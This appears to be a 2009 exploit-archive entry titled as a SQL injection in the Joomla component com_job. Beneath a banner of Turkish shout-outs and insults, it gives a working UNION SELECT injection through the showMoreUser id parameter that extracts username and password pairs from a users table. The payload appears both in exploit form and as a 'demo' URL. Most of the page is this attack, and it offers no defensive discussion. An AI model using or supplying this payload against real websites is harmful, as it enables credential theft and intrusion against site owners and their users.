[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component com_job ( showMoreUse) SQL injection vulnerability
# Published : 2009-12-08
# Author : Palyo34
# Previous Title : Viscacha 0.8 Gold persistant XSS vulnerability
# Next Title : Alqatari group Version 1.0 <== 5.0 (id) Remote SQL Injection Vulnerability
/**************************************************************************
[!] Joomla Component com_job ( showMoreUse) SQL injection vulnerability
[!] Author : Palyo34
[!] Homepage: http://www.1923turk.biz
[!] Date : 12 08, 2009
**************************************************************************/
[+] Manas58
[+] Topunuzun a.q
[+] aponun picleri
[+]
[+]
[+] 7 KAHRAMAN fiEH?D?M?Z? SAYGIYLA ANIYORUZ ALLAH RAHMET EYLES?N
===========================================================================
http://server/index.php?option=com_job&task=showMoreUser&id=[SQL]
[ Exploit ]
index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users--
[ Demo ]
http://www.site.com/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users--
===========================================================================